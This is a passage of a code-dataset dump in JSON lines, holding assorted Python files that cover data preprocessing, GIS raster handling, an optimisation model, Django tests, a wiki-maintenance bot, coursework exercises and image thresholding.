self.data_numeric.reset_index(drop=True)\n\n def get_data_matrix(self, vectorizer=None):\n self.get_rates()\n self.get_crline_year()\n self.get_emp_length()\n self.get_text_string()\n self.text_to_vec(vectorizer=vectorizer)\n self.get_issued_dates()\n self.get_dummies()\n self.get_numeric()\n self.X = pd.concat([self.data_numeric, self.data_dummies, self.data_text_vec], axis=1)\n\n return self.X\n","sub_path":"transform_data.py","file_name":"transform_data.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"594415832","text":"# without repetitions soln in py3 for codeeval by steven a dunn\n\nimport sys\n\nf = open(sys.argv[1], 'r')\n\nfor line in f:\n line = line.strip()\n new_line = \"\"\n #print line\n #print len(line)\n if len(line) == 1:\n print(line)\n continue\n else:\n x = 0\n y = 1\n\n while y < len(line):\n #print line[x], line[y]\n if line[x] != line[y]:\n new_line += line[x]\n if y == len(line) - 1:\n new_line += line[y]\n else:\n if y == len(line) - 1:\n new_line += line[x]\n\n x += 1\n y += 1\n\n print(new_line)\n\nf.close()","sub_path":"WithoutRepetitions/py3/nr.py","file_name":"nr.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"307370596","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 15 11:06:04 2018\n\n@author: sylwia\n\"\"\"\nimport numpy as np\nimport re\nimport pandas as pd\n\n\nbulldog_skills = open('Scrappers/Skills/buldog_skills.txt').read().split('\\n')\nskills_hanscraped = open('Scrappers/Skills/additional_skills.txt').read().split(',')\n#languages_wiki = open('Scrappers/Skills/IT_technologies_list.txt').read().split('\\n')\n\n\n#### skills list preprocessing\n# words with '/' will be separated to two elements\nadditional_list = [s.split('/') for s in (bulldog_skills + skills_hanscraped) if '/' in s]\nadditional_list = [item.strip() for sublist in additional_list for item in sublist] # flaten it\n# characters in '()' brackets will be treated as separated word\nadditional_list_2 = [s.replace(')', '').split('(') for s in (bulldog_skills + skills_hanscraped) if ('(' in s)]\nadditional_list_2 = [item.strip() for sublist in additional_list_2 for item in sublist]\n\nskills_list = bulldog_skills +additional_list + additional_list_2 + skills_hanscraped\nskills_list = [s.replace('.', ' ').strip() for s in skills_list]\nskills_list = list(set(skills_list)) # to remove empty string which wast the first one\n\n\n\n#### preprocess offers\noffers = open('Scrappers/Offers/offers_pracuj_pl.txt').read().split('\\n')\nfor ch in ['/', ',', '.', '(', ')']:\n offers = [o.replace(ch,' ') for o in offers] \n# don't remove stopwords, as it may affect keywords (ruby ON rails, )\n\n\n\ndef find_skills(skl_list):\n skills_pattern = \"[\\s]\" + \"[\\s]|[\\s]\".join(re.escape(skill) for skill in skl_list) +\"[\\s]\"\n r = re.compile(r''+skills_pattern)\n skills_from_offers = [r.findall(o) for o in offers]\n return (skills_from_offers)\n\n#################################################\n# 1. Filter all technologies which have only one letter (R, C, ...?)\nskills_one_letter = list(set([s.upper() for s in skills_list if (len(s)==1 and not s.isdigit())]))\nskills_one_letter = ['C', 'R']\nskills_list_one_letter = find_skills(skills_one_letter)\n\n#################################################\n# 2. Filter the rest of technologies (lower letter)\noffers = [o.lower() for o in offers]\nrest_skills = [s.lower() for s in skills_list]\nexcluded = ['i', 'it', '', ' ', 'developer', 'code', 'processing', 'plus', 'pl', 'sp', 'al', 'software'] + [s.lower() for s in skills_one_letter]\nrest_skills = [s for s in rest_skills if (s not in excluded and not s.isdigit())]\nrest_skills_list = find_skills(rest_skills)\n\n#################################################\n# 3. Merge two skills lists\nmerged_skills_list = [skills_list_one_letter[n] + rest_skills_list[n] for n in range(0,len(rest_skills_list))]\nmerged_skills_list = [list(set(s)) for s in merged_skills_list]\n\n#################################################\n# 4. Create sparse matrix of values\nmerged_skills_list = [s_list for s_list in merged_skills_list if len(s_list) > 1]\nskills_to_blob = [item.strip() for sublist in merged_skills_list for item in sublist]\nunique_merged_skills = list(set(skills_to_blob))\n\nmerged_skills_df = pd.DataFrame(0, index=np.arange(len(merged_skills_list)), columns = list(set(unique_merged_skills)))\nfor n in range(len(merged_skills_list)):\n for skl in merged_skills_list[n]:\n merged_skills_df.loc[n , skl.strip()] = 1\n\n\nthefile = open('Scrappers/Skills/unique_skills.txt', 'w')\nfor skill in unique_merged_skills:\n thefile.write(\"%s\\n\" % skill)\nthefile.close()\n\nthefile = open('skills_to_blob.txt', 'w')\nfor skill in skills_to_blob:\n thefile.write(\"%s\\n\" % skill)\nthefile.close()\n\n\nthefile = open('Scrappers/Offers/offers_preprocessed.txt', 'w')\nfor skill in merged_skills_list:\n thefile.write(\"%s\\n\" % skill)\nthefile.close()\n\n\nmerged_skills_array = np.array('')\nfor lst in merged_skills_list:\n np.append(merged_skills_array, \" \".join(lst))","sub_path":"IT_skills/extract_skills.py","file_name":"extract_skills.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"573105785","text":"import math\nfrom pyscipopt import Model, quicksum, multidict\nimport time\n\nclass Museum:\n\n def __init__(self, epsilon, file):\n #self.distances = get_distnaces(oeuvres)\n\n with open(file, 'r') as doc:\n content = doc.readlines()\n content = [x.strip() for x in content]\n self.p_dist = int(content[0].split(',')[0])\n self.g_dist = int(content[0].split(',')[1])\n self.p_price = int(content[1].split(',')[0])\n self.g_price = int(content[1].split(',')[1])\n self.oeuvres = []\n for line in content[2:]:\n self.oeuvres.append((int(line.split(',')[0]), int(line.split(',')[1])))\n\n self.id = 0\n self.epsilon = epsilon\n\n self.model = Model(\"Camera\")\n\n self.quadrillage_p = self.get_quadrillage()\n self.quadrillage_g = self.get_quadrillage()\n\n print(\"Epsilon = %.1f\" % self.epsilon)\n print(\"L = %.1f\" % self.L)\n print(\"l = %.1f\" % self.l)\n\n self.model.setObjective(quicksum(self.quadrillage_g[i] for i in self.quadrillage_g.keys()) * self.g_price +\n quicksum(self.quadrillage_p[i] for i in self.quadrillage_p.keys()) * self.p_price, \"minimize\")\n\n def get_quadrillage(self):\n\n quadrillage = {}\n\n\n rank_x = sorted([x[0] for x in self.oeuvres])\n self.max_x = rank_x[-1]\n self.min_x = rank_x[0]\n self.L = abs(self.max_x - self.min_x)\n\n rank_y = sorted([y[1] for y in self.oeuvres])\n self.max_y = rank_y[-1]\n self.min_y = rank_y[0]\n self.l = abs(self.max_y - self.min_y)\n\n x = self.min_x\n y = self.min_y\n\n while x <= self.max_x + self.epsilon:\n y = self.min_y\n while y <= self.max_y + self.epsilon:\n self.id += 1\n quadrillage[x,y] = (self.model.addVar(str(self.id), vtype=\"B\"))\n y += self.epsilon\n x += self.epsilon\n\n return quadrillage\n\n def add_constraints(self):\n for o in self.oeuvres:\n print(\"adding\")\n cam_list = self.fetch_close_cam(o)\n self.model.addCons(quicksum(cam_list[i] for i in range(len(cam_list))) >= 1, \"present camera\")\n\n def solve(self):\n self.model.optimize()\n\n def _xvalues(self, x0, dist):\n\n xvalues = []\n difx = (x0 - dist - self.min_x) % self.epsilon\n x = max(x0 - difx - dist, self.min_x)\n while x <= self.max_x and x <= x0 + dist:\n xvalues.append(x)\n x += self.epsilon\n return xvalues\n\n def _yvalues(self, y0, dist):\n\n yvalues = []\n difx = (y0 - dist - self.min_y) % self.epsilon\n y = max(y0 - difx - dist, self.min_y)\n yvalues.append(y)\n while y <= self.max_y and y <= y0 + dist:\n yvalues.append(y)\n y += self.epsilon\n return yvalues\n\n def check_l2_dist(self, a, b, range):\n\n if pow(a[0] - b[0], 2) + pow(a[1] - b[1], 2) <= pow(range,2):\n return True\n return False\n\n def fetch_close_cam(self, o):\n\n camera_list = []\n\n xvalues = self._xvalues(o[0], self.p_dist)\n yvalues = self._yvalues(o[1], self.p_dist)\n for x in xvalues:\n for y in yvalues:\n if self.check_l2_dist(o, (x,y), self.p_dist):\n camera_list.append(self.quadrillage_p[x, y])\n\n\n xvalues = self._xvalues(o[0], self.g_dist)\n yvalues = self._yvalues(o[1], self.g_dist)\n for x in xvalues:\n for y in yvalues:\n if self.check_l2_dist(o, (x,y), self.g_dist):\n camera_list.append(self.quadrillage_g[x, y])\n\n return camera_list\n\n\n def write_result(self, file_name):\n\n result = \"\"\n\n for coord, valeur in self.quadrillage_p.items():\n if self.model.getVal(valeur) == True:\n result += (\"1\" + \",\" + str(int(coord[0])) + \",\" + str(int(coord[1])) + \"\\n\")\n\n for coord, valeur in self.quadrillage_g.items():\n if self.model.getVal(valeur) == True:\n result += (\"2\" + \",\" + str(int(coord[0])) + \",\" + str(int(coord[1])) + \"\\n\")\n\n with open(file_name, \"w\") as result_file:\n result_file.write(result)\n\nif __name__ == '__main__':\n start = time.time()\n museum = Museum(0.5, 'input_9.txt')\n museum.add_constraints()\n stop1 = time.time()\n museum.solve()\n stop2 = time.time()\n print(\"Init time = \", stop1 - start)\n print(\"Solving time = \", stop2 - stop1)\n print(\"Execution time = \", stop2 - start)\n museum.write_result(\"result.txt\")\n","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"99519222","text":"from django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom django.urls import reverse\nfrom django.test import tag\n\nfrom selenium import webdriver\n\nfrom accounts.tests.utils import log_user_in\n\nfrom ..models import Product\n\nclass TestFavoriesSelenium(StaticLiveServerTestCase):\n fixtures = ['products']\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.selenium = webdriver.Firefox()\n cls.selenium.implicitly_wait(15)\n\n @classmethod\n def tearDownClass(cls):\n cls.selenium.quit()\n super().tearDownClass()\n\n @tag('selenium')\n def test_save(self):\n user = log_user_in(self.selenium, self.live_server_url)\n product = Product.objects.order_by('-nutriscore')[0]\n # assert that the user has no favories saved\n self.assertEqual(len(user.profile.favories.all()), 0)\n find_url = f\"{reverse('substitut:find')}?product_id={product.id}\"\n self.selenium.get(self.live_server_url+find_url)\n fav_url = reverse('substitut:favories')\n self.selenium.find_element_by_xpath(\n f\"//form[@action='{fav_url}']/button[@type='submit']\").click()\n # assert that the user has one favorie saved\n self.assertEqual(len(user.profile.favories.all()), 1)\n","sub_path":"substitut_search/tests/tests_functional.py","file_name":"tests_functional.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"477597162","text":"from django.conf import settings\nfrom django.urls import path\nfrom drf_spectacular.views import SpectacularAPIView, SpectacularRedocView\nfrom rest_framework import routers\n\nfrom .views import (\n JobViewSet,\n ObtainTokenView,\n OrgViewSet,\n PlanViewSet,\n ProductCategoryViewSet,\n ProductViewSet,\n ScratchOrgViewSet,\n UserView,\n VersionViewSet,\n)\n\nrouter = routers.DefaultRouter()\nrouter.register(\"jobs\", JobViewSet, basename=\"job\")\nrouter.register(\"products\", ProductViewSet, basename=\"product\")\nrouter.register(\"versions\", VersionViewSet, basename=\"version\")\nrouter.register(\"plans\", PlanViewSet, basename=\"plan\")\nrouter.register(\"categories\", ProductCategoryViewSet, basename=\"productcategory\")\nrouter.register(\"scratch-orgs\", ScratchOrgViewSet, basename=\"scratch-org\")\nurlpatterns = router.urls + [\n path(\"user/\", UserView.as_view(), name=\"user\"),\n path(\"orgs/\", OrgViewSet.as_view(), name=\"org-list\"),\n path(\"token/\", ObtainTokenView.as_view(), name=\"token\"),\n]\n\nif settings.API_DOCS_ENABLED: # pragma: nocover\n urlpatterns += [\n path(\"schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n path(\n \"schema/redoc/\",\n SpectacularRedocView.as_view(url_name=\"schema\"),\n name=\"redoc\",\n ),\n ]\n","sub_path":"metadeploy/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"199578363","text":"import os\r\nimport numpy as np\r\nfrom osgeo import gdal, ogr, osr\r\n\r\n\r\ndef mean_rasters(ras1, ras2, out_file, bound, bound_srs,\r\n no_data, tem_path, **kwargs):\r\n if os.path.exists(out_file):\r\n return\r\n tem_file = os.path.join(tem_path, os.path.splitext(\r\n os.path.basename(out_file))[0] + '.tif')\r\n\r\n ds_in = gdal.Open(ras1)\r\n bound_in = expand_extent(ds_in, bound, bound_srs)\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, outputType=gdal.GDT_Float64,\r\n dstNodata=no_data, outputBounds=bound_in)\r\n ds1 = gdal.Warp(tem_file, ras1, options=option)\r\n ds2 = gdal.Warp('/vsimem/_2.tif', ras2, options=option)\r\n count = min(ds1.RasterCount, ds2.RasterCount)\r\n for c in range(1, 1 + count):\r\n band1 = ds1.GetRasterBand(c)\r\n band2 = ds2.GetRasterBand(c)\r\n arr1 = band1.ReadAsArray()\r\n arr2 = band2.ReadAsArray()\r\n mask = (arr1 != no_data) & (arr2 != no_data)\r\n arr1[mask] = (arr1[mask] + arr2[mask]) / 2\r\n arr1[~mask] = no_data\r\n band1.WriteArray(arr1)\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, outputBounds=bound,\r\n resampleAlg=gdal.GRA_Average, **kwargs,\r\n outputType=gdal.GDT_Float64)\r\n gdal.Warp(out_file, ds1, options=option)\r\n\r\n\r\ndef forest_fraction(ras, out_path, bound, bound_srs,\r\n ids, tem_path, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n tem_file = os.path.join(tem_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n\r\n ds_in = gdal.Open(ras)\r\n bound_in = expand_extent(ds_in, bound, bound_srs)\r\n option = gdal.WarpOptions(multithread=True, creationOptions=creation,\r\n outputBounds=bound_in, dstNodata=2)\r\n ds = gdal.Warp(tem_file, ds_in, options=option)\r\n band = ds.GetRasterBand(1)\r\n cover = ds.ReadAsArray()\r\n is_forest = np.isin(cover, ids).astype(cover.dtype)\r\n band.WriteArray(is_forest)\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, outputBounds=bound,\r\n resampleAlg=gdal.GRA_Average, **kwargs,\r\n outputType=gdal.GDT_Float64)\r\n gdal.Warp(out_file, ds, options=option)\r\n\r\n\r\ndef downscaling(ras, out_path, bound, bound_srs, tem_path, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n tem_file = os.path.join(tem_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n\r\n ds_in = gdal.Open(ras)\r\n bound_in = expand_extent(ds_in, bound, bound_srs)\r\n if os.path.splitext(os.path.basename(ras))[1] == '.grib':\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation,\r\n outputBounds=bound_in,\r\n dstSRS=kwargs['dstSRS'])\r\n else:\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation,\r\n outputBounds=bound_in)\r\n\r\n ds_tem = gdal.Warp(tem_file, ds_in, options=option)\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, **kwargs,\r\n outputBounds=bound,\r\n resampleAlg=gdal.GRA_Average)\r\n # downscaling\r\n gdal.Warp(out_file, ds_tem, options=option)\r\n\r\n\r\ndef deal_LAI(out_path, **kwargs):\r\n LAI_file = os.path.join(out_path, 'leaf_area_index.tif')\r\n if os.path.exists(LAI_file):\r\n return\r\n high_cover_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\high_vegetation_cover.grib')\r\n low_cover_ds = gdal.Open('..\\\\Data\\\\Raw\\\\Time\\\\low_vegetation_cover.grib')\r\n high_LAI_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\leaf_area_index_high_vegetation.grib')\r\n low_LAI_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\leaf_area_index_low_vegetation.grib')\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n **kwargs, creationOptions=creation)\r\n LAI_ds = gdal.Warp(LAI_file, high_LAI_ds, options=option)\r\n high_cover_ds = gdal.Warp('/vsimem/_1.tif', high_cover_ds, options=option)\r\n low_cover_ds = gdal.Warp('/vsimem/_2.tif', low_cover_ds, options=option)\r\n high_LAI_ds = gdal.Warp('/vsimem/_3.tif', high_LAI_ds, options=option)\r\n low_LAI_ds = gdal.Warp('/vsimem/_4.tif', low_LAI_ds, options=option)\r\n\r\n # change LAI\r\n col = LAI_ds.RasterCount\r\n for c in range(1, col + 1):\r\n high_cover_band = high_cover_ds.GetRasterBand(c)\r\n low_cover_band = low_cover_ds.GetRasterBand(c)\r\n high_LAI_band = high_LAI_ds.GetRasterBand(c)\r\n low_LAI_band = low_LAI_ds.GetRasterBand(c)\r\n LAI_band = LAI_ds.GetRasterBand(c)\r\n\r\n high_cover = high_cover_band.ReadAsArray()\r\n low_cover = low_cover_band.ReadAsArray()\r\n high_LAI = high_LAI_band.ReadAsArray()\r\n low_LAI = low_LAI_band.ReadAsArray()\r\n\r\n mask = high_cover != high_cover_band.GetNoDataValue()\r\n LAI = np.copy(high_cover)\r\n LAI[mask] = high_cover[mask] * high_LAI[mask] + \\\r\n low_cover[mask] * low_LAI[mask]\r\n\r\n LAI_band.WriteArray(LAI)\r\n\r\n # destroy dataset\r\n LAI_band = None\r\n LAI_ds = None\r\n\r\n\r\ndef deal_net(out_path, **kwargs):\r\n net_file = os.path.join(out_path, 'surface_net_radiation.tif')\r\n if os.path.exists(net_file):\r\n return\r\n\r\n solar_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\surface_net_solar_radiation.grib')\r\n therm_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\surface_net_thermal_radiation.grib')\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n **kwargs, creationOptions=creation)\r\n net_ds = gdal.Warp(net_file, solar_ds, options=option)\r\n solar_ds = gdal.Warp('/vsimem/_1.tif', solar_ds, options=option)\r\n therm_ds = gdal.Warp('/vsimem/_2.tif', therm_ds, options=option)\r\n\r\n # change net radiation\r\n col = net_ds.RasterCount\r\n for c in range(1, col + 1):\r\n solar_band = solar_ds.GetRasterBand(c)\r\n therm_band = therm_ds.GetRasterBand(c)\r\n net_band = net_ds.GetRasterBand(c)\r\n\r\n solar = solar_band.ReadAsArray()\r\n therm = therm_band.ReadAsArray()\r\n\r\n mask = solar != solar_band.GetNoDataValue()\r\n net = np.copy(solar)\r\n net[mask] = (solar[mask] + therm[mask]) / 1000000\r\n net_band.WriteArray(net)\r\n\r\n # destroy dataset\r\n net_band = None\r\n net_ds = None\r\n\r\n\r\ndef deal_calc(ras, out_path, plus=None, multi=None, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, **kwargs)\r\n out_ds = gdal.Warp(out_file, ras, options=option)\r\n for c in range(1, 1 + out_ds.RasterCount):\r\n out_band = out_ds.GetRasterBand(c)\r\n no_data = out_band.GetNoDataValue()\r\n values = out_band.ReadAsArray()\r\n if plus is not None:\r\n values[values != no_data] = values[values != no_data] + plus\r\n if multi is not None:\r\n values[values != no_data] = values[values != no_data] * multi\r\n out_band.WriteArray(values)\r\n\r\n\r\ndef deal_others(ras, out_path, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, **kwargs)\r\n # downscaling\r\n gdal.Warp(out_file, ras, options=option)\r\n","sub_path":"deal_test.py","file_name":"deal_test.py","file_ext":"py","file_size_in_byte":8396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"268953710","text":"def possible(answer):\n for x, y, stuff in answer:\n if stuff == 0: # pillar\n if y == 0 or [x-1,y,1] in answer or [x,y,1] in answer or [x,y-1,0] in answer:\n # on the floor, on one side of ceiling or on another pillar\n continue\n return False\n elif stuff == 1:\n if [x,y-1,0] in answer or [x+1,y-1,0] in answer or ([x-1, y,1] in answer and [x+1,y,1] in answer):\n continue\n return False\n return True\n\ndef solution(n, build_frame):\n answer = []\n for frame in build_frame:\n x, y, stuff, operate = frame\n if operate == 0:\n answer.remove([x,y,stuff])\n if not possible(answer):\n answer.append([x,y,stuff])\n if operate == 1:\n answer.append([x,y,stuff])\n if not possible(answer):\n answer.remove([x,y,stuff])\n return sorted(answer)\n\n\n","sub_path":"implementaion/implementation_tests/12_construction(mod).py","file_name":"12_construction(mod).py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"170405814","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Author: Dominik Gresch \n# Date: 10.04.2015 11:00:57 CEST\n# File: uc.py\n\nfrom .atoms import Elements\n\nimport numpy as np\nimport mayavi.mlab as ml\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef plot(uc, radius_type='crystal', **elements):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n for i in range(3):\n ml.plot3d([0, uc[i][0]], [0, uc[i][1]], [0, uc[i][2]], color=(1, 0, 0))\n for j in range(3):\n if(i != j):\n ml.plot3d([uc[j][0], uc[j][0] + uc[i][0]],\n [uc[j][1], uc[j][1] + uc[i][1]],\n [uc[j][2], uc[j][2] + uc[i][2]], color=(0, 0, 1))\n for k in range(3):\n if(i != k and j != k):\n ml.plot3d([uc[k][0] + uc[j][0], uc[k][0] + uc[j][0] + uc[i][0]],\n [uc[k][1] + uc[j][1], uc[k][1] + uc[j][1] + uc[i][1]],\n [uc[k][2] + uc[j][2], uc[k][2] + uc[j][2] + uc[i][2]], color=(0, 0, 1))\n ax.set_xlim(0, uc[0][0])\n ax.set_ylim(0, uc[1][1])\n ax.set_zlim(0, uc[2][2])\n\n for el, pos in elements.items():\n element = Elements[el]\n size = element[radius_type + '_r']\n color = tuple(x / 256. for x in element.color)\n for coord in pos:\n cartesian = sum(((coord[j] + 1) % 1) * uc[j] for j in range(3))\n ml.points3d([cartesian[0]], [cartesian[1]], [cartesian[2]], scale_factor=size, color=color, resolution=20)\n \n ml.show()\n","sub_path":"phys/uc.py","file_name":"uc.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"194373390","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nimport pymysql\n\nos.environ['PYWIKIBOT_DIR'] = os.path.dirname(os.path.realpath(__file__))\nimport pywikibot\n\nfrom config import config_page_name, database # pylint: disable=E0611,W0614\n\n\nos.environ['TZ'] = 'UTC'\n\nsite = pywikibot.Site()\nsite.login()\n\nconfig_page = pywikibot.Page(site, config_page_name)\ncfg = config_page.text\ncfg = json.loads(cfg)\nprint(json.dumps(cfg, indent=4, ensure_ascii=False))\n\nif not cfg['enable']:\n exit('disabled\\n')\n\noutputPage = pywikibot.Page(site, cfg['output_page_name'])\n\ntable = (\n '{| class=\"wikitable sortable\"'\n '\\n|-'\n '\\n! 頁面 !! 引用數 !! 編輯保護 !! 移動保護 !! 重定向 !! 備註'\n)\n\n\ndb = pymysql.connect(host=database['host'],\n user=database['user'],\n passwd=database['passwd'],\n db=database['db'],\n charset=database['charset'])\ncur = db.cursor()\n\ncur.execute(\"\"\"SELECT `title`, `count`, `protectedit`, `protectmove`, `redirect` FROM `MostTranscludedPages_page` ORDER BY `count` DESC\"\"\")\nrows = cur.fetchall()\n\ncountsysop = 0\ncountautoconfirmed = 0\nfor row in rows:\n title = row[0]\n count = row[1]\n protectedit = row[2]\n protectmove = row[3]\n redirect = row[4]\n comment = ''\n\n if count >= 5000:\n if protectedit != 'sysop':\n comment = '[{{{{fullurl:{0}|action=protect&mwProtect-level-edit=sysop&mwProtect-level-move=sysop&mwProtect-reason=高風險模板:{1}引用}}}} 需要全保護]'.format(\n title, count)\n countsysop += 1\n elif count >= 500:\n if protectedit == '' and not title.startswith('模块:'):\n comment = '[{{{{fullurl:{0}|action=protect&mwProtect-level-edit=autoconfirmed&mwProtect-level-move=autoconfirmed&mwProtect-reason=高風險模板:{1}引用}}}} 需要半保護]'.format(\n title, count)\n countautoconfirmed += 1\n\n table += '\\n|-\\n| [[{0}]] || {1} || {2} || {3} || {4} || {5}'.format(\n title, count, protectedit, protectmove, redirect, comment\n )\n\ntable += '\\n|}'\n\noutput = \"\"\"* {0}個頁面需要全保護\n* {1}個頁面需要半保護\n{2}\n\"\"\".format(countsysop, countautoconfirmed, table)\n\noutputPage.text = output\noutputPage.save(summary=cfg['summary'])\n","sub_path":"MostTranscludedPages/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"212781265","text":"\"\"\"\nПользователь вводит месяц в виде целого числа от 1 до 12.\nСообщить к какому времени года относится месяц (зима, весна, лето, осень).\nНапишите решения через list и через dict.\n\"\"\"\n# Словарь с месяцем и соотвествующим временем года\nseasons_dict = {\n 1: \"Зима\",\n 2: \"Зима\",\n 3: \"Весна\",\n 4: \"Весна\",\n 5: \"Весна\",\n 6: \"Лето\",\n 7: \"Лето\",\n 8: \"Лето\",\n 9: \"Осень\",\n 10: \"Осень\",\n 11: \"Осень\",\n 12: \"Зима\",\n}\n\n# Ввод пользователем номера месяца\nuser_number = input(\"Введите месяц в виде целого числа от 1 до 12 - \")\n\n# Проверка корректности ввода пользователем\nif user_number.isdigit():\n # Если ввод корректный.\n # Вывод времени года соответствующему номеру месяца\n user_number = int(user_number)\n print(f\"Месяц №{user_number} относится к времени года - \"\n f\"{seasons_dict[user_number]}\")\nelse:\n # Если ввод некорректный\n print(\"Вы ввели не число. Необходимо ввести число.\")\n\n\n\n\n\n","sub_path":"Урок 2. Встроенные типы и операции с ними/Homework#2.3_dict.py","file_name":"Homework#2.3_dict.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"541944230","text":"import yaml\nimport os\n\npardir = os.path.dirname(__file__)\nconfig_path = pardir + '/../config/config.yaml'\n\nclass ReadConfig():\n def __init__(self, yaml_file = config_path):\n self.yaml_file = yaml_file\n self.configs = self._read_yaml()\n\n def _read_yaml(self):\n with open(self.yaml_file, encoding='utf-8') as f:\n config_dict = yaml.load(stream=f.read(), Loader=yaml.FullLoader)\n return config_dict\n\n def config(self, path):\n list_path = path.split('.')\n try:\n if len(list_path) < 1:\n print('参数错误!')\n elif len(list_path) == 1:\n return self.configs[list_path[0]]\n else:\n return self.configs[list_path[0]][list_path[1]]\n except:\n print('请检查参数路径是否正确:%s'%path)\n\n\n def write_yaml(self):\n with open(self.yaml_file, mode='a', encoding='utf-8') as f:\n data = {'name4':'张崇垚'}\n # allow_unicode=True 可写入中文\n yaml.dump(data, stream=f, allow_unicode=True)\n\nif __name__ == '__main__':\n read_config = ReadConfig()\n print(read_config.config('database.hostname.user'))\n\n # print(config_path)\n # read_config.config('2.3')\n # read_config.config('database.port')\n # read_config.write_yaml()","sub_path":"utils/read_config.py","file_name":"read_config.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"495150136","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nimg = cv2.imread(\"cv_ss_0.png\",0)\r\n\r\n#dimensions = img.shape\r\nI = np.zeros((1,255))\r\n\r\na = 0\r\nb = 0\r\n\r\ni = img.shape[1]\r\nj = img.shape[0]\r\ncuml = 0\r\n#print(i)\r\n#print(j)\r\n\r\n#print(img[0,0])\r\n \r\nfin_img = img\r\n\r\nwhile (a=i*j/2:\r\n break\r\n ctr = ctr + 1\r\n\r\na = 0\r\nb = 0\r\n\r\nprint(cuml)\r\nprint(ctr)\r\n\r\ncv2.imshow('image', img)\r\n\r\nblk = 0\r\nwht = 0\r\n\r\nwhile (actr):\r\n fin_img[b,a] = 255\r\n blk = blk + 1\r\n b = b + 1\r\n a = a + 1\r\n b = 0\r\n\r\ncv2.imshow('50-50 image', fin_img)\r\n\r\nprint(wht)\r\nprint(blk)\r\n\r\ncv2.waitKey(0)\r\n\r\ncv2.imwrite('Prob4_1.png', fin_img)\r\n\r\n\"\"\" a = 0\r\nimg2 = img\r\n\r\nwhile (a=128 and img[b,a]<192)):\r\n img2[b,a] = 0\r\n elif ((img[b,a]>64 and img[b,a]<128) or (img[b,a]>=192 and img[b,a]<=255)):\r\n img2[b,a] = 255\r\n b = b + 1\r\n a = a + 1\r\n b = 0\r\n \"\"\"\r\ncv2.imshow('final image', 